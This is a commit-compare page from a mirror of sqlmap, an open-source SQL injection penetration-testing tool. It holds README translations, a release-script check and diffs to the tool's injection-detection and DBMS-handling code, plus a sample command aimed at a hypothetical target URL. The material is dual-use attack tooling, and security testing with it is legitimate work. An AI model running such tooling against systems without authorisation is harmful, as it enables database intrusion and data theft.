Mirror of https://github.com/sqlmapproject/sqlmap.git (synced 2025-12-07 05:01:30 +00:00)

Compare commits (138 commits)
| SHA1 |
|---|
| f1c102a020 |
| 834ea2d0d8 |
| ae972de8fc |
| 62519eed04 |
| 222fd856fa |
| db94d24db1 |
| 116c1c8b5c |
| afc2a42383 |
| 44664dd7d6 |
| 35ba94b3a9 |
| 24c261d630 |
| 6a8ea0557c |
| 721bf4d243 |
| e02ce4eb1f |
| 2f8e8a5f62 |
| 7de63a7efb |
| 12f802c70f |
| 96ffb4b911 |
| 93cb879e5d |
| f67f26cebd |
| 942ac7733a |
| 2496db9d96 |
| a3249019d9 |
| 96f80879ff |
| 96b9950f96 |
| 30ea219228 |
| 7c41bc57e7 |
| e609bd04ad |
| 511f2a6d12 |
| 415ce05a2f |
| 06deda3223 |
| d4170f11f0 |
| cb2258fea4 |
| c871cedae4 |
| 3e4130c5e6 |
| a6c04a59cb |
| 53eb44304f |
| 400339a884 |
| 8b0c50f25d |
| e42b63f51c |
| b8f88a079a |
| a761e1d165 |
| 5b6926ae05 |
| e862da6d4e |
| 1ac0704c09 |
| b6b51bea9d |
| 672abe8416 |
| fac6712a35 |
| 68ee1f361b |
| 62ae149464 |
| f071c8500c |
| 5745d650f8 |
| de8ea53d46 |
| 23081f83db |
| 4d56a806e8 |
| 1745bac0ab |
| 0f9c81965b |
| d12b65d38c |
| 38c70d9799 |
| a9a744fec6 |
| 3c5ee552f0 |
| 8ca45695ab |
| bf40526785 |
| 9b41efcbe1 |
| 36f3fd72e6 |
| facc54f60b |
| 4c7da11331 |
| e21f67715c |
| e38267a61e |
| 7d147f613f |
| 591a60bbde |
| 3f40bf1101 |
| d248317b89 |
| 75fd878242 |
| 30378c8ae3 |
| c9b3b47d6f |
| d038d027f9 |
| c6577b80d9 |
| 4a4fa07bdd |
| a4ebd5418f |
| ba369b73d3 |
| 614f290217 |
| 1678b606a2 |
| aef5d6667f |
| b622c25f9d |
| e07ff7168b |
| ce48217ada |
| b6969df52a |
| 0e728aa73e |
| f93c19ba9d |
| dd19527e9c |
| a42ddad9c1 |
| a2973296a2 |
| 0961f6a5e9 |
| fae965f8b6 |
| 0d756a8823 |
| 8df4cc3983 |
| 5ec44b8346 |
| d577c57a11 |
| ca24509e19 |
| e2d3187a78 |
| b4980778dd |
| 71457fea0e |
| 34281af3f6 |
| 7dbbf3ecf5 |
| c41c93a404 |
| 9a7343e9f7 |
| e0401104f2 |
| 9da8d55128 |
| 864711b434 |
| 996ad59126 |
| 6d48df2454 |
| 55a43a837b |
| 455d41c6a0 |
| eb26dd8984 |
| 0f34300221 |
| 93a875ec71 |
| 0edb4f6680 |
| b9b5d07336 |
| 5f3235ef57 |
| dfe42612be |
| a0202f7bfd |
| 6dd9d5b2dd |
| 0864387885 |
| 359bfb2704 |
| 644ea2e3aa |
| 071132cd56 |
| 7a18dde2e0 |
| e146763399 |
| 4ce08dcfa3 |
| 2ca5ddce5f |
| addb2445b7 |
| 4736a525b8 |
| d3a08a2d22 |
| ee5b5cdcbc |
| f3f2c81cec |
| 1e8df40981 |
| 389133654e |
@@ -52,6 +52,7 @@ Links
Translations
----

* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md)
* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)

@@ -59,6 +60,7 @@ Translations
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
doc/translations/README-bg-BG.md (new file, 50 lines)
@@ -0,0 +1,50 @@
# sqlmap

[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws in database servers. It comes with a powerful detection engine, many niche features for the advanced tester, and a broad range of functions that can be used for many purposes: extracting data from the database, accessing the underlying file system, and executing commands on the operating system.

Screenshots
----



You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features on the wiki.

Installation
----

You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or the latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master).

Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:

    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform.

Usage
----

To get a list of basic options use:

    python sqlmap.py -h

To get a list of all options use:

    python sqlmap.py -hh

You can find a sample run of sqlmap [here](https://asciinema.org/a/46601).
To get an overview of sqlmap's capabilities, a list of supported features, and a description of all options, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).

Links
----

* Homepage: http://sqlmap.org
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
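As a quick illustration of the usage notes above (the target URL here is hypothetical and not taken from any file in this changeset), a typical first run against a single injectable GET parameter looks like:

    python sqlmap.py -u "http://www.example.com/vuln.php?id=1" --batch

where `-u` supplies the target URL and `--batch` accepts the default answer to every prompt; both switches appear in the output of `python sqlmap.py -hh`.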
@@ -35,7 +35,7 @@ To get a list of advanced options use:

    python sqlmap.py -hh

You can find a sample run [here](https://asciinema.org/a/46601).
To get an overview of sqlmap's capabilities, a list of supported features, and a description of all options, along with examples, you are advised to read the [user manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
To get an overview of sqlmap's capabilities, a list of supported features, and a description of all options, along with examples, you are advised to read the [User's Guide](https://github.com/sqlmapproject/sqlmap/wiki/Usage).

Links
----
doc/translations/README-pl-PL.md (new file, 50 lines)
@@ -0,0 +1,50 @@
# sqlmap

[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)

sqlmap is an open source penetration testing tool that automates the process of detecting, exploiting and testing the resilience of SQL servers against injection of unwanted code. It contains a powerful detection engine, many niche features for advanced penetration tests, and a broad range of options, from database fingerprinting, through data extraction, up to accessing the file system and executing commands on the server's operating system over out-of-band connections.

Screenshots
----



You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features on the wiki.

Installation
----

The latest tarball is available by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master), or the latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master).

You can also download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:

    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap requires [Python](http://www.python.org/download/) version **2.6.x** or **2.7.x** on any platform.

Usage
----

To get a list of basic options and switches use:

    python sqlmap.py -h

To get a list of all options and switches use:

    python sqlmap.py -hh

A sample run is available [here](https://asciinema.org/a/46601).
For a list of all available features, options and descriptions of how they work, along with usage examples, we suggest visiting the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).

Links
----

* Project homepage: http://sqlmap.org
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
@@ -1,5 +1,10 @@
#!/bin/bash

if [ ! -f ~/.pypirc ]; then
echo "File ~/.pypirc is missing"
exit 1
fi

declare -x SCRIPTPATH="${0}"
SETTINGS="${SCRIPTPATH%/*}/../../lib/core/settings.py"
VERSION=$(cat $SETTINGS | grep -E "^VERSION =" | cut -d '"' -f 2 | cut -d '.' -f 1-3)
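The VERSION line above can be traced step by step; assuming settings.py carries the value introduced later in this changeset (VERSION = "1.1.10.0"), the pipeline yields:

    grep -E '^VERSION =' lib/core/settings.py   # VERSION = "1.1.10.0"
    ... | cut -d '"' -f 2                       # 1.1.10.0
    ... | cut -d '.' -f 1-3                     # 1.1.10

so the script releases under the three-component version number, dropping the trailing monthly-commit counter.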
@@ -7,10 +7,12 @@ See the file 'doc/COPYING' for copying permission
import copy
import httplib
import os
import random
import re
import socket
import subprocess
import tempfile
import time

from extra.beep.beep import beep

@@ -30,6 +32,7 @@ from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import intersect
from lib.core.common import listToStrValue
from lib.core.common import openFile
from lib.core.common import parseFilePaths
from lib.core.common import popValue
from lib.core.common import pushValue

@@ -55,6 +58,7 @@ from lib.core.enums import HASHDB_KEYS
from lib.core.enums import HEURISTIC_TEST
from lib.core.enums import HTTP_HEADER
from lib.core.enums import HTTPMETHOD
from lib.core.enums import MKSTEMP_PREFIX
from lib.core.enums import NOTE
from lib.core.enums import NULLCONNECTION
from lib.core.enums import PAYLOAD

@@ -63,8 +67,11 @@ from lib.core.enums import REDIRECTION
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapSkipTargetException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import CANDIDATE_SENTENCE_MIN_LENGTH
from lib.core.settings import CHECK_INTERNET_ADDRESS
from lib.core.settings import CHECK_INTERNET_VALUE
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX
from lib.core.settings import FI_ERROR_REGEX

@@ -126,7 +133,7 @@ def checkSqlInjection(place, parameter, value):
# then attempt to identify with a simple DBMS specific boolean-based
# test what the DBMS may be
if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
if not Backend.getIdentifiedDbms() and kb.heuristicDbms is None:
if not Backend.getIdentifiedDbms() and kb.heuristicDbms is None and not kb.droppingRequests:
kb.heuristicDbms = heuristicCheckDbms(injection)

# If the DBMS has already been fingerprinted (via DBMS-specific

@@ -160,6 +167,13 @@ def checkSqlInjection(place, parameter, value):
unionExtended = False
trueCode, falseCode = None, None

if conf.httpCollector is not None:
conf.httpCollector.setExtendedArguments({
"_title": title,
"_place": place,
"_parameter": parameter,
})

if stype == PAYLOAD.TECHNIQUE.UNION:
configUnion(test.request.char)

@@ -243,17 +257,23 @@ def checkSqlInjection(place, parameter, value):
if payloadDbms is not None:
# Skip DBMS-specific test if it does not match the user's
# provided DBMS
if conf.dbms is not None and not intersect(payloadDbms, conf.dbms, True):
if conf.dbms and not intersect(payloadDbms, conf.dbms, True):
debugMsg = "skipping test '%s' because " % title
debugMsg += "the provided DBMS is %s" % conf.dbms
debugMsg += "its declared DBMS is different than provided"
logger.debug(debugMsg)
continue

if kb.dbmsFilter and not intersect(payloadDbms, kb.dbmsFilter, True):
debugMsg = "skipping test '%s' because " % title
debugMsg += "its declared DBMS is different than provided"
logger.debug(debugMsg)
continue

# Skip DBMS-specific test if it does not match the
# previously identified DBMS (via DBMS-specific payload)
if injection.dbms is not None and not intersect(payloadDbms, injection.dbms, True):
debugMsg = "skipping test '%s' because the identified " % title
debugMsg += "back-end DBMS is %s" % injection.dbms
if injection.dbms and not intersect(payloadDbms, injection.dbms, True):
debugMsg = "skipping test '%s' because " % title
debugMsg += "its declared DBMS is different than identified"
logger.debug(debugMsg)
continue

@@ -491,7 +511,7 @@ def checkSqlInjection(place, parameter, value):
if candidates:
candidates = sorted(candidates, key=lambda _: len(_))
for candidate in candidates:
if re.match(r"\A[\w.,! ]+\Z", candidate) and ' ' in candidate and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH:
if re.match(r"\A[\w.,! ]+\Z", candidate) and ' ' in candidate and candidate.strip() and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH:
conf.string = candidate
injectable = True

@@ -550,14 +570,11 @@ def checkSqlInjection(place, parameter, value):
# Perform the test's request and grep the response
# body for the test's <grep> regular expression
try:
page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False)
page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, listToStrValue( \
[headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] \
if headers else None), re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, threadData.lastRedirectMsg[1] \
if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, listToStrValue([headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] if headers else None), re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)

if output:
result = output == "1"

@@ -607,7 +624,9 @@ def checkSqlInjection(place, parameter, value):
configUnion(test.request.char, test.request.columns)

if not Backend.getIdentifiedDbms():
if len(kb.dbmsFilter or []) == 1:
Backend.forceDbms(kb.dbmsFilter[0])
elif not Backend.getIdentifiedDbms():
if kb.heuristicDbms is None:
warnMsg = "using unescaped version of the test "
warnMsg += "because of zero knowledge of the "

@@ -738,10 +757,17 @@ def checkSqlInjection(place, parameter, value):
warnMsg = "user aborted during detection phase"
logger.warn(warnMsg)

msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
choice = readInput(msg, default='S', checkBatch=False).upper()
if conf.multipleTargets:
msg = "how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
choice = readInput(msg, default='T', checkBatch=False).upper()
else:
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
choice = readInput(msg, default='S', checkBatch=False).upper()

if choice == 'C':
if choice == 'X':
if conf.multipleTargets:
raise SqlmapSkipTargetException
elif choice == 'C':
choice = None
while not ((choice or "").isdigit() and 0 <= int(choice) <= 6):
if choice:

@@ -818,6 +844,8 @@ def heuristicCheckDbms(injection):
infoMsg += "could be '%s' " % retVal
logger.info(infoMsg)

kb.heuristicExtendedDbms = retVal

return retVal

def checkFalsePositives(injection):

@@ -960,7 +988,7 @@ def heuristicCheckSqlInjection(place, parameter):
payload = "%s%s%s" % (prefix, randStr, suffix)
payload = agent.payload(place, parameter, newValue=payload)
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)

kb.heuristicPage = page
kb.heuristicMode = False

@@ -1016,7 +1044,7 @@ def heuristicCheckSqlInjection(place, parameter):
value = "%s%s%s" % (randStr1, DUMMY_NON_SQLI_CHECK_APPENDIX, randStr2)
payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
payload = agent.payload(place, parameter, newValue=payload)
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)

paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place

@@ -1125,7 +1153,7 @@ def checkDynamicContent(firstPage, secondPage):
warnMsg += ". sqlmap is going to retry the request"
logger.critical(warnMsg)

secondPage, _ = Request.queryPage(content=True)
secondPage, _, _ = Request.queryPage(content=True)
findDynamicContent(firstPage, secondPage)

def checkStability():

@@ -1148,7 +1176,7 @@ def checkStability():
delay = max(0, min(1, delay))
time.sleep(delay)

secondPage, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False)
secondPage, _, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False)

if kb.redirectChoice:
return None

@@ -1230,7 +1258,7 @@ def checkString():
infoMsg += "target URL page content"
logger.info(infoMsg)

page, headers = Request.queryPage(content=True)
page, headers, _ = Request.queryPage(content=True)
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)

if conf.string not in rawResponse:

@@ -1249,7 +1277,7 @@ def checkRegexp():
infoMsg += "the target URL page content"
logger.info(infoMsg)

page, headers = Request.queryPage(content=True)
page, headers, _ = Request.queryPage(content=True)
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)

if not re.search(conf.regexp, rawResponse, re.I | re.M):

@@ -1277,6 +1305,9 @@ def checkWaf():
logger.critical(warnMsg)
return _

if not kb.originalPage:
return None

infoMsg = "checking if the target is protected by "
infoMsg += "some kind of WAF/IPS/IDS"
logger.info(infoMsg)

@@ -1368,6 +1399,18 @@ def identifyWaf():
retVal.append(product)

if retVal:
if kb.wafSpecificResponse and len(retVal) == 1 and "unknown" in retVal[0].lower():
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.SPECIFIC_RESPONSE)
os.close(handle)
with openFile(filename, "w+b") as f:
f.write(kb.wafSpecificResponse)

message = "WAF/IPS/IDS specific response can be found in '%s'. " % filename
message += "If you know the details on used protection please "
message += "report it along with specific response "
message += "to 'dev@sqlmap.org'"
logger.warn(message)

message = "are you sure that you want to "
message += "continue with further target testing? [y/N] "
choice = readInput(message, default='N', boolean=True)

@@ -1456,7 +1499,7 @@ def checkConnection(suppressOutput=False):
try:
kb.originalPageTime = time.time()
page, headers = Request.queryPage(content=True, noteResponseTime=False)
page, headers, _ = Request.queryPage(content=True, noteResponseTime=False)
kb.originalPage = kb.pageTemplate = page

kb.errorIsNone = False

@@ -1469,9 +1512,10 @@ def checkConnection(suppressOutput=False):
warnMsg += "which could interfere with the results of the tests"
logger.warn(warnMsg)
elif wasLastResponseHTTPError():
warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError()
warnMsg += "which could interfere with the results of the tests"
logger.warn(warnMsg)
if getLastRequestHTTPError() != conf.ignoreCode:
warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError()
warnMsg += "which could interfere with the results of the tests"
logger.warn(warnMsg)
else:
kb.errorIsNone = True

@@ -1501,6 +1545,10 @@ def checkConnection(suppressOutput=False):
return True

def checkInternet():
content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0]
return CHECK_INTERNET_VALUE in (content or "")

def setVerbosity(): # Cross-linked function
raise NotImplementedError
@@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
import os
import re
import time

from lib.controller.action import action
from lib.controller.checks import checkSqlInjection

@@ -15,6 +16,7 @@ from lib.controller.checks import checkStability
from lib.controller.checks import checkString
from lib.controller.checks import checkRegexp
from lib.controller.checks import checkConnection
from lib.controller.checks import checkInternet
from lib.controller.checks import checkNullConnection
from lib.controller.checks import checkWaf
from lib.controller.checks import heuristicCheckSqlInjection

@@ -52,6 +54,7 @@ from lib.core.exception import SqlmapBaseException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapNotVulnerableException
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapSkipTargetException
from lib.core.exception import SqlmapValueException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import ASP_NET_CONTROL_REGEX

@@ -276,6 +279,21 @@ def start():
for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
try:

if conf.checkInternet:
infoMsg = "[INFO] checking for Internet connection"
logger.info(infoMsg)

if not checkInternet():
warnMsg = "[%s] [WARNING] no connection detected" % time.strftime("%X")
dataToStdout(warnMsg)

while not checkInternet():
dataToStdout('.')
time.sleep(5)

dataToStdout("\n")

conf.url = targetUrl
conf.method = targetMethod.upper() if targetMethod else targetMethod
conf.data = targetData

@@ -649,6 +667,9 @@ def start():
else:
raise

except SqlmapSkipTargetException:
pass

except SqlmapUserQuitException:
raise
@@ -70,12 +70,22 @@ def setHandler():
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
]

_ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)
_ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items)
if _:
items.remove(_)
items.insert(0, _)

for dbms, aliases, Handler, Connector in items:
if conf.forceDbms:
if conf.forceDbms.lower() not in aliases:
continue
else:
kb.dbms = conf.dbms = conf.forceDbms = dbms

if kb.dbmsFilter:
if dbms not in kb.dbmsFilter:
continue

handler = Handler()
conf.dbmsConnector = Connector()

@@ -96,7 +106,7 @@ def setHandler():
else:
conf.dbmsConnector.connect()

if handler.checkDbms():
if conf.forceDbms == dbms or handler.checkDbms():
if kb.resolutionDbms:
conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]()
else:
@@ -36,7 +36,6 @@ from lib.core.enums import POST_HINT
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
from lib.core.settings import BOUNDED_INJECTION_MARKER
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import GENERIC_SQL_COMMENT

@@ -101,7 +100,7 @@ class Agent(object):
if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
paramString = origValue
if place == PLACE.URI:
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
origValue = origValue.split(kb.customInjectionMark)[0]
else:
origValue = filter(None, (re.search(_, origValue.split(BOUNDED_INJECTION_MARKER)[0]) for _ in (r"\w+\Z", r"[^\"'><]+\Z", r"[^ ]+\Z")))[0].group(0)
origValue = origValue[origValue.rfind('/') + 1:]

@@ -110,19 +109,19 @@ class Agent(object):
origValue = origValue[origValue.rfind(char) + 1:]
elif place == PLACE.CUSTOM_POST:
paramString = origValue
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
origValue = origValue.split(kb.customInjectionMark)[0]
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
origValue = origValue.split('>')[-1]
elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)\s*(?P<result>[^"\[,]+\Z)', origValue)
origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)[\s:]*(?P<result>[^"\[,]+\Z)', origValue)
else:
_ = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"&]+\Z)", origValue) or ""
origValue = _.split('=', 1)[1] if '=' in _ else ""
elif place == PLACE.CUSTOM_HEADER:
paramString = origValue
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
origValue = origValue.split(kb.customInjectionMark)[0]
origValue = origValue[origValue.find(',') + 1:]
match = re.search(r"([^;]+)=(?P<value>[^;]+);?\Z", origValue)
match = re.search(r"([^;]+)=(?P<value>[^;]*);?\Z", origValue)
if match:
origValue = match.group("value")
elif ',' in paramString:

@@ -131,6 +130,8 @@ class Agent(object):
if header.upper() == HTTP_HEADER.AUTHORIZATION.upper():
origValue = origValue.split(' ')[-1].split(':')[-1]

origValue = origValue or ""

if value is None:
if where == PAYLOAD.WHERE.ORIGINAL:
value = origValue

@@ -159,17 +160,16 @@ class Agent(object):
newValue = self.cleanupPayload(newValue, origValue)

if place in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):
_ = "%s%s" % (origValue, CUSTOM_INJECTION_MARK_CHAR)
_ = "%s%s" % (origValue, kb.customInjectionMark)
if kb.postHint == POST_HINT.JSON and not isNumber(newValue) and not '"%s"' % _ in paramString:
newValue = '"%s"' % newValue
elif kb.postHint == POST_HINT.JSON_LIKE and not isNumber(newValue) and not "'%s'" % _ in paramString:
newValue = "'%s'" % newValue
newValue = newValue.replace(CUSTOM_INJECTION_MARK_CHAR, REPLACEMENT_MARKER)
newValue = newValue.replace(kb.customInjectionMark, REPLACEMENT_MARKER)
retVal = paramString.replace(_, self.addPayloadDelimiters(newValue))
retVal = retVal.replace(CUSTOM_INJECTION_MARK_CHAR, "").replace(REPLACEMENT_MARKER, CUSTOM_INJECTION_MARK_CHAR)
retVal = retVal.replace(kb.customInjectionMark, "").replace(REPLACEMENT_MARKER, kb.customInjectionMark)
elif BOUNDED_INJECTION_MARKER in paramDict[parameter]:
_ = "%s%s" % (origValue, BOUNDED_INJECTION_MARKER)
retVal = "%s=%s" % (re.sub(r" (\#\d\*|\(.+\))\Z", "", parameter), paramString.replace(_, self.addPayloadDelimiters(newValue)))
retVal = paramString.replace("%s%s" % (origValue, BOUNDED_INJECTION_MARKER), self.addPayloadDelimiters(newValue))
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
else:

@@ -347,6 +347,12 @@ class Agent(object):
if payload:
payload = payload.replace(SLEEP_TIME_MARKER, str(conf.timeSec))

for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):
payload = payload.replace(_, str(randomInt()))

for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)):
payload = payload.replace(_, randomStr())

return payload

def getComment(self, request):

@@ -858,7 +864,7 @@ class Agent(object):
if expression.find(queries[Backend.getIdentifiedDbms()].limitstring.query) > 0:
_ = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query)
else:
_ = expression.index("LIMIT ")
_ = re.search(r"\bLIMIT\b", expression, re.I).start()
expression = expression[:_]

elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
@@ -97,8 +97,8 @@ from lib.core.settings import BOUNDED_INJECTION_MARKER
from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES
from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES
from lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DBMS_DIRECTORY_DICT
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import DEFAULT_MSSQL_SCHEMA

@@ -435,7 +435,7 @@ class Backend:
# Get methods
@staticmethod
def getForcedDbms():
return aliasToDbmsEnum(kb.get("forcedDbms"))
return aliasToDbmsEnum(conf.get("forceDbms")) or aliasToDbmsEnum(kb.get("forcedDbms"))

@staticmethod
def getDbms():

@@ -635,7 +635,7 @@ def paramToDict(place, parameters=None):
current[key] = "%s%s" % (str(value).lower(), BOUNDED_INJECTION_MARKER)
else:
current[key] = "%s%s" % (value, BOUNDED_INJECTION_MARKER)
candidates["%s (%s)" % (parameter, key)] = re.sub("(%s\s*=\s*)%s" % (re.escape(parameter), re.escape(testableParameters[parameter])), r"\g<1>%s" % json.dumps(deserialized), parameters)
candidates["%s (%s)" % (parameter, key)] = re.sub(r"\b(%s\s*=\s*)%s" % (re.escape(parameter), re.escape(testableParameters[parameter])), r"\g<1>%s" % json.dumps(deserialized), parameters)
current[key] = original

deserialized = json.loads(testableParameters[parameter])

@@ -654,12 +654,12 @@ def paramToDict(place, parameters=None):
except Exception:
pass

_ = re.sub(regex, "\g<1>%s\g<%d>" % (CUSTOM_INJECTION_MARK_CHAR, len(match.groups())), testableParameters[parameter])
_ = re.sub(regex, r"\g<1>%s\g<%d>" % (kb.customInjectionMark, len(match.groups())), testableParameters[parameter])
message = "it appears that provided value for %s parameter '%s' " % (place, parameter)
message += "has boundaries. Do you want to inject inside? ('%s') [y/N] " % getUnicode(_)

if readInput(message, default='N', boolean=True):
testableParameters[parameter] = re.sub(regex, "\g<1>%s\g<2>" % BOUNDED_INJECTION_MARKER, testableParameters[parameter])
